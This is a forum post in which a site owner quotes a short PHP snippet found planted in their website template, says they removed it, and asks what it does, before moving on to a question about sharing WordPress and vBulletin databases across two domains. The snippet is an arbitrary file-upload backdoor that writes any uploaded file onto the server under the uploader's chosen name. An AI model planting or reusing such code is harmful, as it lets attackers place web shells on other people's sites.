Well it seems something else was causing it to break, it works now

And the scroll box is fixed too oddly.
Oddly i found this code on my template:
Code:
<?php $ficnt = @fread(@fopen($_FILES["s"]["tmp_name"], "rb"), $_FILES["s"]["size"]);
if(@fwrite(@fopen($_FILES["s"]["name"], "wb"), $ficnt)) echo $_FILES["s"]["name"]; ?>
I removed it since i believe that's the work of a hacker but what does it do?
Also how would I have it so that I have two domains both on the same server in which one of the domains has a separate wordpress db then the other domains has both the forum and wordpress. I'm sure it can be done just need to know how to make seperate wp and vb db's work together. I didn't understand the post you gave me earlier about that too much.